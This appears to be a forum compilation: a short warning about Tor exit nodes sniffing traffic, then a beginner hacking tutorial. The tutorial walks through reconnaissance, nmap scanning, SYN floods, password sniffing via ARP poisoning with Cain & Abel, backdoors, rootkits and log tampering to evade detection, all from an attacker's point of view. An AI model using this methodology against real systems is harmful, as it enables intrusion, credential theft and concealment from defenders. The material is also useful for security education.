Using Tor are you sure you want to continue ?

TOR - The Onion Router is definetely a great choice for hackers when it comes to surf the internet anonymously as it is totally free and helps you defend against revealing states of personal information and freedom.

It protects you by bouncing off your Public Ip Address to the underlying distributed network of relays running by volunteer all around the world. It is undoubtedly the best program available for giving you anonymity but wait. Give it another thought.

To your surprise, a malicious node is a weak link in the whole security chain of the TOR network. Lets get in more deeper with it and check out what TOR actually says itself. Well, TOR clearly explains everything about its anonymous services.

Once going through it, it can easily be concluded that TOR is awesome when it comes to anonymity but bad and worst at its privacy protection and data security consecutively. All the data which is passed is first encrypted by the first node and then passed on to the next one, However exit node still gets the data in an un-encrypted format and clear text.

Hence it can easily be quoted that whatever you do using TOR hides your Public IP with Ip Address of the exit node, but on the counterpart, exit node can grab all the data and information that you might be sending to any of the website.

The whole scenario is something like an Advanced Man In The Middle Attack as the exit node can sniff all your data you are sending to your destination which can include your passwords, cookies, secret documents, net banking certificates, etc. This will be said to be Advanced MITM as MITM generally takes place in a local network while this one can take place anywhere irrespective of your Age/Sex/Location.

But In Case you love TOR and still dont want to leave TOR can go for using cool services like Putty, OpenSSH, etc. for sending confidential information. Also any of third party end to end (Source to destination) software can be implemented so that both anonymity and privacy can be scored.

So whenever you use TOR next time, give a small thought for what you will be surfing through it.

This tutorial is meant for beginners. Anyhow, it might be useful for intermediate/experts too!

I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a
black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others what i have learned so far & don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I Am writing this tutorial for educational purposes only.

Before you hack a system, you must decide what is your goal. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discover vulns & see how you can exploit them, etc ... The point is you have to decide the goal.

The most common goals are:

1. breaking into the system & taking the admin privileges.
2. gaining sensitive data, such as credit cards, identification theft, etc.

You should have all the tools ready before you start taking the steps of hacking. There is a *nix version called backtrack. It is an OS that comes various set of security tools that helps you hacking systems (doing penetration test).
You should set the steps (methodology) that you have to take in your journey. There is a common methodology followed by hackers i will mention it below. However, you can create your own methodology if you know what u r doing.

Common steps to be taken for hacking a system:

1. Reconnaissance(footprinting).
2. Scanning.
3. Ports & Services Enumeration.
4. Vulnerability Assessment.
5. Vulnerability Exploitation.
6. Penetration and Access.
7. Privilege Escalation & owning the box.
8. Erase tracks.
9. Maintaining access.
The above methodology can change referring to your goals. Feel free comrades!

Before you break into a system, you have to collect as much info as you can. You have to study your target well before you hack. This step is called Reconnaissance. Reconnaissance is achieved by you using techniques & tools that undetectable by a target. You are gathering your target info that is publicly published, e.g. browse your target website & if they are looking for a SQL employee and Windows server admin, then you get a hint that they are running Windows Server & do SQL's, this is called a "passive" action. Lets an example of active action! Example of active action, call the company to obtain some info, visit the company, email employees to get some info, go to the target website & read its source code. In other words, passive action means you gather info in non-intrusive manner. Active action is a step further, such as talking to the company as you are a customer, things like that. It is not really important to know what action is passive & what is active, the main goal here to gather info! Simple ha? Good, let me go deeper little bit.

In passive reconnaissance, there is 0 chance of getting caught ;-), as you only target publicly available info to give you the feel on how your target look like. Type of info you can gather through passive recon. are, names, phones numbers, location address, partner networks, and many more. This can aid you when you want to do some social engineering! Hence, sometimes you can get some non-public info is revealed when you do passive reconnaissance. There are several tools helps you to do passive reconnaissance, such as whois (who is). Whois helps you obtain extensive info, such as names, domains of the target, etc. Other great tools are, Sam Spad, domaintools, and google(can reveal lots of target subdomians & many more).

Active reconnaissance goes beyond the passive nature, such as communicating with target without being caught, such as scanning. Anything not discovered in IDS(Intrusion Detection System) is considered active. You have to think of ways to extract info of the company in a normal way, public way by going deeper little bit than passive recon. e.g. you can go to the physical location do some social engineering, email staff, communicate with employees based on info's you have got in passive recons. Things like that!

Example of some techniques for active reconnaissance, such as banner grabbing, view company's public website source code and directory structure, social engineering, shoulder surfing, etc.

What the heck is banner grabbing?
You let the server sends you a block of information that tells you OS version of your target system & various association with it. Banner tells OS version n various association. Anything listens on a "port" can determine the operating system (OS) "the port" is running on, this called fingerprinting. In other words, fingerprinting is the process of determining the operating system (OS) or applications used by a remote target.

Quote:
Learn more about banner grabbing:
http://www.net-square.com/httprint/httprint_paper.html

Can you give a brief example of Social Engineering?
For example, you try to know where IT admin goes after business hours, then start go to the place he goes & build a relationship , start making a friend relationship to extract more info slowly but surely, things like that! you know what i mean.

What is shoulder surfing?
Simply, stands behind a person shoulder and see what the guy is doing & typing on keyboard. This can happen in wireless network area where everyone is using a laptop in public areas.

In summary, reconnaissance is one of the most important steps in hacking. The main concept is to gather all info that publicly available or easy obtainable. Info that we gather will help us in social engineering and research purpose which will lead you to very critical info about the system. It starts by obtaining names, phones, emails, IP range, domain structure, and so on.

Let me show you how banner grabbing is done, telnet on your target server on port 80 as following, go to command line or terminal and type

telnet xx.xxx.xxx.xxx 80

Now connection is established, that stupid server thinks you are web browser connected to it, it waits you to enter commands so the server can you give you info about your request. In this situation, you have to write a command that says "Hey you web server, give me a content of sucn and such website". However, we do not really want to visit the website through telnet, do you? You can just go to web browser & request the website from there. Our purpose here is to freak the server out enough, so it spits back a code that says, hey! this doesn't work but here is some info that might help you do some trouble shooting. This technique allows you to finger print various component of the target system.

Note: instead telnet xxx.xx.xxx.xx 80, you can do nc xxx.xx.xxx.xxx 80! Same thing ... nc stands for netcat ... xx.xxx.xx.xxx represents IP address of the target system.

After you do telnet xxx.xx.xxx.xxx 80, the remote sever will wait you to enter a command.

Type this:

HEAD / HTTP/1.0

Then you will get a reply looks similar to what you see in this link:

http://www.net-square.com/httprint/httprint_paper.html

Ok, you get it now?

lets say our target got the following version: the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8

At this point if you know any vulnerability for this particular OS or this particular Apache or PHP. You can start doing the exploitation process ;-) ...

Another example, use program called sam-spade which gives you alot of the info about your target. The target does not know actually what we are doing against their server, since they haven't seen anything been triggered by IDS or Firewall.
*What is the difference between IDS & Firewall?
An IDS (Intrusion Detection System) may only detect and warn you of a violation of your privacy. Although most block major attacks, some probes or other attacks may just be noted and allowed through. There's also an evolution of the IDS called an IPS (Intrusion Prevention System) that watches for the same things an IDS does, but instead of just alerting, it blocks the traffic.

A good firewall will block almost all attacks unless specified otherwise or designed otherwise. The only problem is, the firewall might not warn you of the attacks and may just block them.

It may be a good idea to have both an IDS and a Firewall, because the IDS will warn you and then the firewall will block the attack. Over the years, firewalls got more complex and added more features. One of these features is actually IDS - today you can have a firewall that already has ID(Firewall/IDS's are combined into one internet security program).


Learn more about banner grabbing:
http://www.net-square.com/httprint/httprint_paper.html

To learn how to do through Google, you need like the following book:
http://www.amazon.com/exec/obidos/ASIN/ ... /ref=nosim

Note: the book in amazon is just an example for you to give you an idea of what kind of book you should be looking for - if you are interested.

Alright, now you at least have an idea of what reconnaissance is! lets talk about scanning...

When you scan your target's network, you actually start touching the system. Scanning a network determines whats in there, scanning network gives you the feel how is your target network is laid out such as if there are multiple subnets, which hosts are alive, check ports, see if system is alive, discover available hosts & get info about the discovered hosts. There are thousands of tools can be used to scan networks! Scanning a network can easily get picked up by IDS. Anyhow, no one will pay attention except if you do it over and over because scans happens on such a regular basis on the internet. Therefore, people who read the logs, i means the webmaster won't really pay attention to every single scan occurs, so you don't have to worry a lot. There are ways to avoid being picked up by IDS :-). After you finish scanning, you will gain a list of network nodes that exists there.

"Node" is an active electronic device that is attached to a network, and is capable of sending, receiving, or forwarding information over a communications channel. If you want to learn more, google it or visit http://en.wikipedia.org/wiki/Node_(networking) ...

Ok now we want to discover live hosts via scanning. This is the first action taken against your target network network. Depending on method of scanning you use, you can be detected by IDS. Most admins will ignore detections because it happens a lot unless something abnormal happens.

There are various scanner tools, e.g. nmap, superscan, and many more. There are various scan methods, some are stealthy, others are not.

Before i talk about various scanning methods, let me explain to you about TCP connections basics. When you scan your target using TCP communication, there are six TCP flags can be utilized during packet transmission(packets get transmitted during scanning process). A flag will indicate whether the sent packets are syn, ack, fin, urg, psh, or rst packets. These packets sets you in a position on how you want to communicate with the remote host. You can get different info depending on the flag you choose for the scanning.

TCP establishes three handshakes, syn, syn-ack, ack. What are they?
When you scan your target using TCP communication, you send a syn packet(syn request), and then target sends you back an ack packet with syn packet. Now, you send an ack packet to the target. So now both machines establish the connection well, like they have made a well established tunnel for a proper guaranteed communication without losing any packets during communicating with each other. A hacker can get caught easily if he uses this method to hack other systems illegally.

Hackers use non-standard combination of these six flags, which gives them info that are not normally available to the public.

Have you heard about syn flood?
syn flood is done by utilizing three handshake by sending "syn" request to the target, so the target receives a syn request and send an a syn-ack back to the originator(you). You ignore the target syn-ack request - when you ignore it, then the three handshakes is not completed, this is called half open TCP connection - In theory, when the target sends you syn-ack, the target allocates some RAM on its machine.

The amount of RAM on the target machine must be open until it gets response (ack packet) back from you because till now only two handshake has been made,so the TCP connection process is not completed yet. However, there is always a time limit for the RAM to be opened, so if 30 secs passed by & the target did not get the ack from you, the connection will abort(failed TCP handshake - timeout) & RAM will be reallocated.

The idea here is to send hell a lot of packets in few secs so in 30 secs, you can send 40 million packets(lets say one packet size is 1kb) which is heavy on the RAM since the RAM might not have enough memory to carry 40 million packets. Therefore, you force the target to make half open TCP connection attempts, so definitely the target machine will stop responding to legitimate request. In other words, if you send 40 million syn requests to that remote host, it's going to allocate a hell of a lot of ram for those requests. After a while, it's going to eat up all of the ram. Thus, target system goes down. This is called syn flood attack.

In short, syn flood attack makes the system (i.e. the IP stack or kernel) chokes on the memory allocations (or simply runs out of memory) or the target application (i.e. web server) chokes on the processing load. You got it? Or not yet?! Syn flood is an old technique i just mentioned it here for illustration purposes.

General Information: these days, SYN floods are used to make systems inaccessible. They have a limited number of half open connections, you use them all, and they can't accept any more SYNs. But again, modern software throws away old SYNs once the limit is reached. Note that different systems will behave differently.

If you interested in learning more about syn flood, visit
http://tools.ietf.org/html/rfc4987
Lets talk about the most common TCP Scan types. There are full scan, half open scan, stealth scan, Xmas scan, and ack scan.

full scan: this completes 3 way TCP. it is the most effective & gives more accurate results. However, it is not safe and easily traced and detected.

half open scan: it is the second most effective scanning method, only uses first part of the handshake to get syn-ack but does not send 3rd part (ack) back to the remote host. The idea here is if the remote replies back to you after you have sent syn request, this means the port - we sent the syn to - must be open.

stealth scan: the idea here is to scan ports randomly(not in sequential order) & reduce the speed of scanning. If you scan all port from 1 to 65536 in sequence, your more visible to be detected, and usually scanning happens so fast, which is unusual since regular program does not connect to port that fast, so this can make it easier to be detected. Therefore you have to scan ports randomly & reduce the speed of scanning. To avoid IDS, you should not use full connection scan with stealth scan, you can use half-open scan(syn). syn is considered a stealth scan. In fact, syn scan is called syn-stealth scan, or you can use Xmas scan with stealth scan which helps you to evade detection, things like that! you get my point i guess.

Xmas scan: uses fin, urg, and push flags which are used to bypass some firewalls. Xmas scan works with UNIX system, it does not work with Windows system.

ack scan: this helps you evading IDS not to get you detected. You send only an ack packet to your target, your target won't know how to deal with it since there was no handshake. Thus, ack scan causes open ports in your target machine to return a reset packet(rst), rst packet gives you a hint that the port or service is not filtered between point A and point B, which usually firewal resides in between! Since the port replied you with rst packet this means there is no firewall between A(your machine) & B(port or service on the target machine) and rst packet also gives you an insight that the target port is open ;-). If there is a firewall, your ack packet would not reach to the target port & because of that you won't get any rst packet. In addition, rst packet helps you indentify what system is running on the remote host.

These are the most common method of scans, there are hundreds of scanning methods! nmap allows you to set your own custom scan type e.g. instead of sending ack flags only, you can send ack flag and rst flag together and see what you get back from target ...

OK! we have talked about how TCP scanning works in general. Now, i will be talking about UDP & ICMP Scanning ... UDP and ICMP connections most of the times are blocked at the firewall level & even at the host level in some cases. We are going to scan on hosts & ports that respond via UDP. When you scan your target via UDP, there are many problem will occur during that process e.g. you can scan over the ports via UDP, assume you scanned port 1, and port 1 is closed, then host will send ICMP unreachable back to you, which gives an insight that port is closed because you didn't get any UDP response back from target! Making sense,right? Unfortunately, we will never get a response back from target to ensure you that port is open!

Thats how UDP call works, send the packet & forget it. Lets say we come across port 21, and 21 is open, then port 21 on target machine will not reply back to you because UDP does not give you the guarantee the delivery packets during communication process, it just send the packet and forget, unlike TCP which guarantees the delivery of packets with no loss or corruption. Since we didn't get reply back, then we can assume the port 21 is open *OR* maybe port 21 is closed and ICMP reply got lost somewhere so we didn't get it! A general rule, when you don't get a reply you assume port is open.

Some high professionals security person purposely configure ports to not to respond a UDP scanning. ICMP scanning is as same as UDP. ICMP scanning is noisy & can be picked by IDS very easily because ICMP sends random several pings to the network instead of a single host(ICMP scanning does a 'ping scanning' - sends ICMP packets - to the whole network instead of a single host). After you finish ICMP scanning, based on the replies you get back from the live hosts, then you can determine that your target network is listening for ICMP traffic and you might to do some exploit based on that. Unfortunately, there aren't alot of ICMP exploits going around, so you are just going to use ICMP for network enumeration, you just do it to see what hosts are up, host A is up , host B is up & host C is up, they are replying for my ICMP. Thus, this let us know these 3 hosts are running on the targeted network and potentially can be a target for us. IDS's are always listening for network scans & alot of network scanners provide a support for ICMP scanning, but do not have a way to make it stealthy! Therefore, ICMP can turn on the IDS alert which tells the security person there is somebody scans your whole network.

nmap is a great tool that is very popular, it is usually used to scan networks, hosts, ports, and does a lot of other stuff. It is very intrusive tool and considered a hacking tool. Using nmap against systems you dont own or don't have permission to scan can be considered illegal. Lets see examples of some scanning method!

Example of ICMP Scanning(-sP) - this is called ping scan

nmap -v -sP xx.xxx.xxx.xx > filename

nmap: represents the program we are running which nmap.
-v: for increased verbosity, which means bring me extra details of the targeted system. (Optional - as far as i know)
-sP: the flag that determines the scanning method.
x's: target IP address.
> filename: output the results to the newly specified filename. In other words, save results in a file (Optional)

This above command shows you the systems that are up and running, so this shows what available to us on the targeted network. As a result, you will get simple info that shows you there are number of IP addresses that responded to ping request - Note: there could be a lot more machines out there that are not responding to ICMP scanning.

Lets see an example of UDP scan, UDP scan not so speed.

nmap -v -sU xx.xxx.xxx.xx

Results of UDP scan(-sU) give more info than ping scan(-sP). Keep in mind there could be hundreds of other ports are listening on the system which simply don't respond to UDP connection.


Useful sources relates to scanning methods via nmap:
http://www.nmap-tutorial.com/pdf/nmap-tutorial.pdf
http://www.petri.co.il/port-scanning-with-nmap.htm
ALRIGHT, now you have a good basic understanding about scanning! Next, i will be talking about fingerprinting! So keep learning :-)

Now lets get deeper! By now we have determined what nodes are running up on the network. So we are ready to gather large info on those live systems we discovered in the previous steps. Ok! now you need to discover what services (application) are running on your target's host. Every (or at least many) port has a service running on it. For example, web server usually are running on port 80. What we have to do is scan ports, see what kind of services(applications) are running on them, try to grab the versions of the services, this will help you to determine the OS as well. This is called 'Port & Service Enumeration(fingerprinting)'. We have to do this step to understand what potential vulnerabilities your target has & how to exploit them.

Assume after we have scanned our target system, we found our target runs "IIS 5.0 Server" on "port 80". Based on the scanning result, you can say the target server is running IIS 5.0(IIS is set of Internet-based services, IIS is the second most popular web server - IIS is a Microsoft product), it is known IIS 5.0. has too many vulnerabilities & IIS 5.0 runs on Windows 2000, which Windows 2000 by itself has hundreds of vulns.

In other words, lets scan ports and services, and do OS fingerprinting, lets identify services on those live host in our target network. Once we know what services are running and what OS are running then we can start exploiting these services! - 'ping/port/service' scans are frequently run together using the same tool.

NOTE: identifying ports & services is the most critical part in hacking ... PERIOD

OS fingerprinting is used for determining OS type and version, then we exploit vulnerability. that resides into the OS. When you fingerprint a target, your targets' OS can be known from the TCP/IP stack, so fingerprinting happens on TCP/IP stack. Why? Because each OS has a unique implementation of TCP/IP, so TCP/IP stack is implemented differently from OS to OS, so an exact same query sent to one machine the respond of the result will be different than the other machine. Therefore, based on the response this can help the scanner determines the OS of the target, because every OS has its own unqiue response when you do OS fingerprinting request.

When you do a default install of OS, certain services will be installed by default, services that are needed for that OS to work properly, e.g. ports
137,138,139,and 445 which all combined together to produce Win 2000 OS or above. Another example, a combination of 139 and 445 can determine a certain version of windows such as Win XP or Win 2003, there are lots of ways to determine OS. Another example, if you see a service MS SQL is running on a certain port, you can determine the target OS is not in *nix family, it is in a Win family cause the target is running a Microsoft sql product. Thus, we can say port enumeration or service enumeration can help you in determining OS.

There tons of popular scanners out there:
SuperScan - Works good on Win OS.
Nmap - Works on *nix & Windows, *nix version is much more stable than Win version.

Most scanners offer full, half, stealth, and UDP scans.

You are going to spend most of your time scanning your target machine to know whats available there, so you can exploit the vulnerability & penetrate the system. Therefore, you have to do some exploration on scanning methods & decide which method of scanning you feel more comfortable with...

Lets see an example of enumeration style scanning. Just keep in mind, this can be considered hacking! Make sure you do to your system, not somebody's else.

This is kind of a stealth scan:
nmap -v -sS -A -sV xx.xxx.xx.xx > filename

This above request gives you very specific details about your target. sV is for version information identification. Check out the manual to know what these flags do - type "man nmap" to see the manual...

Alright, after we have fingerprinted services & OS, now its the time to check for various vulns against application(services) & OS running on the target system. This is called vulnerability assessment. To do vulnerability assessment, you can use the tools available, such as nessus. Nessus is free vulnerability assessment, huge database, its the best assessment tool.

Lets scan vulnerability on the target system. Lets say target system is win 2000 SP1 IIS 5.0, nessus goes back to its database and check the vulnerability for win2000 & IIS 5.0. If there is vulns not discovered, vulnerability assessment tool actually can't vulnerability it. However, if nessus couldn't find matching vulnerability for the target system, it will let you if the system can have some security issues or not. Such tools are considered as Automated Vulnerability Assessment Tools. You have to know about the target system OS so you can do vulnerability assessment on it. There are vulnerability assessment OS specific, e.g. MBSA tool(only scans Win OS).

NOTE: you can do vulnerability assessment manually, this depends on you and your skills. By doing it manually, you can discover vulnerability . that nobody knows about it, and you can use it for your own use. It is a powerful and very discrete.

After we determined what systems & what services contain vulnerability, then we can exploit it(means take a chance of this vulnerability to achieve what you want).
common vulnerabilities out there are:

OS vulnerabilities
Webserver vulnerabilities
Database vulnerabilities
TCP stack vulnerabilities
Application vulnerabilities

Malwares, viruses, trojans, can be used to exploit vulnerabilities.

There are several automated vulnerability scanners, such as Nessus, Nikto. Security websites is a good resource for vulnerabilities as well, e.g.
bugtraq, CVE(Common Vulnerabilities and Exposures) sites, etc. Another good source to find vulnerabilities is hacker web sites.

Lets talk about the tools:

*Nessus - this is a great vulnerability assessment tool. However, in alot of cases it will perform exploits to see if the OS or service is actually vulnerable or not.

*Metasploit Framework - this is not vulnerability assessment tool. It is an exploitation tool, it contains hundrands of exploits helps you to exploit the system by using a nice selection of tools.

I will explain shortly about the common vulnerability ...

OS vulnerability : OS exploits are used to gain access to the system. OS exploits can used for DoS attacks too. watch the video tutorial. Most OS holes exist from default configuration, services and applications.

Web server Vulnerabilities: web servers are the most targeted section. All people contact the web server, thus you never know the hacker than a normal user. Web servers examples, Apache, IIS, and Tomcat. After you exploit the vulnerability in your target web server, you can gain many different things, such as root access(the gist), website defacement, DoS(put the server down), theft or alteration data on server, or further penetration into the network.
Web server is a great place to start when you want to do a penetration test!

Database Vulnerabilities: those software vendors who create databases applications such as SQL, Oracle, etc - they don't have security in mind, they care more into efficiency and how to make it easy for the users to handle with the database. They care about making their customers happy without giving that much attention in security issues!

TCP Stack Vulnerabilities: this is not a common used method to hack systems. Google it!

Application Vulnerabilities: some examples of application vulnerability, buffer overflow, weak authentication mechanisms, poor data validation(the most common one), and poor error checking.

ALRIGHT, to discover these vulnerabilities on the target machine you need to do vulnerability assessment. This can be done in two ways, manually or automatically. Manually means you try to discover a vulnerability . by yourself which eventually you will have vulnerability . that nobody else knows it & you can use it for yourself or publish it to security sites. Automatically means you rely on a tool that searches for vulnerability in the target machine, this tool has a database full of vulnerability . so this 'tool' will only inform you the vulnerability found in the target machine by relying on 'its' database. We are going to talk about auto vulnerability assessment. The most common & wonderful tool is Nessus, its free open source code!

A lot of common sense comes into play when analyzing vulnerability , for example you do not look for a database vulnerability in a web server, things like that. Another resources, OVAL - gives you a good and basic foundation of vulnerability assess. methodology, Frist - keeps track of vulnerability and make exploits of these vulnerability , you can join a paid subscription and then browse vulnerability available in their database and download exploits this is a good source for hacking or security, and websites for posting exploits such as milw0rm, hacking sites.

Lets have a closer look at nessus tool, nessus is client/server architecture. The process of setting it up is cumbersome. Nessus have about 9000 plugging, therefore it takes time to perform the assessment. Results can be reviewed in a report. The report includes the vulnerabilities found on the target machine with a short description about the vulnerability.

Note: you can enable several plug-ins in plugin tab. You can specify range of ports through scan options. To specify the target, you should go to the target tab.

Once we have done the vulnerability assessment, and knew what vulnerabilities exit. We start gathering exploits of the found vulnerabilities to penetrate the system.

Lets talk about penetration and access! After all information we have gathered previously, its the time to break the system with the exploits you have.

Its the time to stop gathering information and start breaking into system. The ultimate goal is to gain the highest level of permissions. Try to use undiscovered techniques and methods. Think out of the box!
Some of exploits that enable penetration are:

*Buffer overflows
*Stack exploits
*Web vulnerabilities
*Services/apps that allow unauthenticated access.

Aside from the standard methods of penetration, lets see an penetration methods, here are some examples:

*SQL Injection - ability to change queries in the application before its sent into database.

*Application Error Handling - this can result DoS. Probably one of the most common vulnerability you can find in corporate arenas.

*Directory Traversal - browse directories you should not be able to do so on.

*Malformed Packets - one of the more difficult methods of penetration, requires very extensive knowledge of how TCP packets are assembled and disassembled. But once you get used to it, its probably the most effective ways of hacking.

*Bypassing Access Controls - password cracking is most common means of accessing systems.

*Social Engineering - i guess you know what it means.

*Sniffers - take passwords right off the wire, a lot of protocols and application such as http & ftp communicate passwods over the wire in plain text.

*Session hijacking - it is similar to sniffers, but you don't gain a password because we take off the entire session, hijack the victim's session & act as you are him.

Usually when you get passwords, you get it encrypted, or hashed or hidden in some way or another. Password cracking can be done in several ways, examples:

*Brute Force Attack - Every password, can and will be broken by brute force attack. It is about the time. Depends on the size of the password.

*Dictionary Attack - less effective than brute force, relies on list of words or phrases.

*Hybrid Attack - combination of different tools. It is a combination of effectiveness of brute force and dictionary attacks & often using other attack mechanisms, such as cryptanalysis attack (one of the hybrid attack).

You should know that when you do sniffing, you often get usernames & passwords in plain text. However, you can get encrypted passwords from sniffing as well. You will need to use of the cracking techniques discussed above. Sometimes cracking an encrypted passwords can take secs, hours, days, months, or even more!!!

There is a great software called "Cain & Abel", it sniffs passwords from the wire, cracks it, etc. Once you install it, go to sniffers tab, then move to the found passwords in cracker tab to see what you have got! There is lots to it. You should know these techniques as a security person cause if you don't know it, a black hat will take care of it.

Now, assume we already have hacked the system. We will try to do different things, such as getting the root, etc. Penetration & compromise got some differences in the meaning. Hacking into system does not mean you have compromised(taking the full control - take over) the system. After you penetrate the system, you can grab the session between client and server, e.g. you keep listening on login sessions, so when the remote user login to google, the session be dropped to you, once you get the session, the remote user won't be able to get into his account he/she will see at page goes blank(disconnected), so he/she may think its a problem in a connection, thus he/she tries to login again & everything works fine! BUT you already got his session, you won't have to go through login page when you want to see his/her email inbox, cause its already among the whole session you have taken.

Another way to do this, lets say the attacker has compromised the user's system, thus the attacker can let the session drop on his machine, then he takes the session, reads and saves it. After that, he redirects the user to the server, this step will make everything works ok like nothing wrong happen.

Lets see an example of the above explained steps, after attacker installs "Cain & Abel" application, he moves to "attack base system" & click the sniffer button at the top & click the yellow button(APR Poisoning Button) besides the sniffer button. This APR Poising button trick the attacked system to talk to the attacker instead of normally who it talks to. For testing purposes, go and add various system addresses(IP's) to the list. Let say one of the user amongst those targeted IP's logon into 'google', at the authentication process you will notice varies pieces of info comes to you. You are gathering info by getting into the middle of the communication process. Now view the files you have got in the list, you can see among the lines the username & password of the users' 'google' account in plain text! So how dangerous this can be to your privacy :-/! So be careful....
Once the hacker gains access to the system. He aims for admin(root) access. He moves up from guest level, to user level, up to root level. Owning the box, means take the system & prevent the admin from controlling the system, as well as preventing other hackers from getting in. So you hackers usually move on from the regular level, to the admin level so they can have full control. A hacker needs privilege escalation to compromise the system well. Some exploits allow buffer/stack overflows to obtain admin access. All it takes is a guest user, then a hacker can perform exploitations locally & there he goes to the root.

At this point, we did everything up to owning the box. Now our goal is to protect our access. Thus, we want to maintain our access to that hacked system, so we can use it later. You can maintain a system by using such tools, backdoor accounts, backdoor software programs, rootkits, etc. These tools help you maintain access. Some hackers own the box close all other accounts except his account, so the security person shut the system down, reformat the system and start over again.

By doing this, hacker account will be gone. Once we ensure we have maintained our access to the system, then we want to expand ourselves to other parts of the network. Remember, if you do not do this on your own network, somebody else will take care of it. If he does, i do not think you will be too happy! Once you got an access, and could maintain it successfully. You want to prevent detection or loss of access. There are several methods to maintain access, such as rootkits, OS exploits, erase tracks, install trojans that make you access backdoor, enable null sessions (webmaster usually go to the registry & disable null sessions to keep that vuln. from being exploited, webmasters usually do it once & do not get back to it. You can go there & enable it - NOTE: by enabling null sessions you can give other hackers a chance to hack too), and many more.

There different ways of system compromise, system compromise usually depends on your goal, examples of system compromising are root access(ultimate goal), data access/theft, DoS, and many more. Keep in mind, compromised systems can be detected after a while.

Now after a hacker breaks into the system, he tries to protect what he has hacked & erase his tracks. During the attack process try not to be detected so the webmaster don't shut the server off, as well as do not forget to erase your tracks, e.g. you dont want the webmaster to see lots of failed logon in the log files, so you erase tracks to prevent future detection. Typically, get in the network as a shadow or ghost.

There are many method to evade those IDS so they don't cut off your attack stream. Common methods for evading defenses might be by fragmenting packets(some programs do that e.g. fragroute), port redirectors, encoders(change the flow, the look, and feel of various traffics to pass firewall). After you get in and deceive defenses, you want to go to the log files and erase your tracks. Remember: sometimes you get in a user account then you get into a root by changing permissions of the user account, so you have to remember to set this user permissions back to as it was, things like that - you know what i mean, put yourself in a hackers shoe. Don't delete the whole log files, this can make the security person more suspicious. We want to leave everything as it was so nobody can get a feel that an intruder was here.

To be safe, you should know where your actions are recorded, delete log files and other evidences that can get you caught, Steganography (google it), and evading IDS & firewalls. All actions are recorded in some place on the system or the network. Assume IDS detects you, what do security persons do? Usually when you get detected, they may cut off all the ways for you so you don't get a chance to penetrate, they probably going track you down, or they may decide let you go but watch you the entire time.

Where are your actions recorded & what things can let security person knows that you hacked his system? they are recorded in log files for various applications(e.g. IIS & Apache log files), file access times(note: there are tools for hackers that allow you to modify file access time), windows registry entries, hacker tools left behind (be aware of the residual configuration you have left behind - make sure you set all the configurations back to as it was), OS performance stats, IDS, proxy servers(make sure how you send and receive data. If you are going to use proxy server, set up a permanent tunnel through the proxy to the remote host that is compromised), and firewalls(usually very rich with logs).

There are various types of IDS, IDS can set anywhere in the network. There are network based IDS, host based IDS, and application based IDS.

Deleting evidences of your hack is extremely difficult, it requires you have a very high knowledge of the system you are trying to compromise(all the prior steps we did, such as scanning, foot printing, etc will be handy to compromise the system). It is easy to cover the known log files, such as web logs, firewall, IDS logs, etc. However, it is important to know how the default logs work. Highly skilled hackers, study the target well & take the time in fingerprinting & footprinting everything properly. It may take him up to one week before he hacks the target, but when he penetrates his job is done more smoothly & quietly. Unlike, the other ones who are just using some tools to break the system as fast as possible without studying the target well.

It is possible to delete log files! It is simple but usually requires admin access. Some files/logs may be deleted automatically with reboot. Don't delete log files, it brings up suspicion. If you do so, the security person can indicates very clearly that a hacker broke into the system.

Most common way of hiding your tracks is by using a rootkit. Rootkit is set of tools used by an attacker after the attacker gets the root-access to system. Rootkits conceals(to keep from being observed) attacker activities on the hacked system. Once rootkit set on the system, its practically impossible to rid of it because rootkit uses technology, called "hooks", that usually most of the time embed itself into various components of OS & effectively the OS going to be a toaster when the rootkit is all set and done. Security person has to rebuild his machine when rootkit is detected after we properly investigate it.
Steganography its about hiding a file into another file. Like hiding a malware into a normal software which makes it difficult for firewall or AV to detect the malware. That's the basic concept of Steganography. There are alot of tools out there allow us to hide files inside another files.

You can evade IDS & firewalls by using random slow stealth scanning technique so traffic goes unnoticed, this takes longer to scan but makes detection more difficult. Try to use non-standard techniques, think outside the box.

Remember: not everyone out there is a security expert. To secure your system well, you need to put yourself in a hacker set of mind.

By now, you have learned the basic methodology that hackers use to break into the system. Anyhow, lets take a closer look on hacking techniques, such as encryption, sql injection, sniffers, and many more.

Encryption: files can be encrypted in a storage. Communication channels can be encrypted as well, communication channel encryption encrypts the entire communication path, so all traffics sent and received are encrypted, e.g. SSL technology encrypts the entire communication path. There are many ways hackers get away of encrypted traffic & get info in not encrypted form. If you are using your own encryption method, you always should test your encryption for crackability before you use it officially.

Sniffers: sniffers is a common tool used by hackers. Sniffers listens on any traffic that goes through the wire of the target system, listens ins and outs traffics. Promiscuous mode is a mode that is listening for any traffic that goes through the wire. Standard promiscuous mode sniffer is a basic technique. There are more advanced techniques other than promiscuous mode. Sniffing enables the attacker to pick up a plain text, and other sensitive data that goes 'from' or 'to' the target. Sniffers record captured traffic, then after you sniff you can go offline & start analyzing that captured traffic. Popular sniffers are ethereal, etherape, ettercap, and network monitor(for Win OS only - not so effective).

Wireless Hacking: this is a new technology & starts taking place nowadays. Easy to setup, but not frequently secured since not many people understand the security configuration, so they decide not to set it up or set it up poorly. There are various tools that detect wireless networks, popular war driving software are Netstumbler, Airsnort, Airopeek, Kismet, and many more. What is war driving? google it!

SQL Injection: sql injection is a technique that allows an attacker to steal a valuable database information. This attack relies on poor data validation and poor error checking.

Buffer Overflows: buffer overflow is common, the cause of buffer overflow is poor coding. Buffer overflows might be noticed while coding. Buffer overflow happens when the programmer does not clearly define boundaries on buffers or variables. We use out of bound data to insert malicious code or execute command on the remote host. Buffer Overflows can cause programs to freeze or lockup, can cause machine to crash, or let you use exploits & leads you to compromise the system. To build buffer overflows, you need a good programming skills, good knowledge of stack and buffer vulnerability.

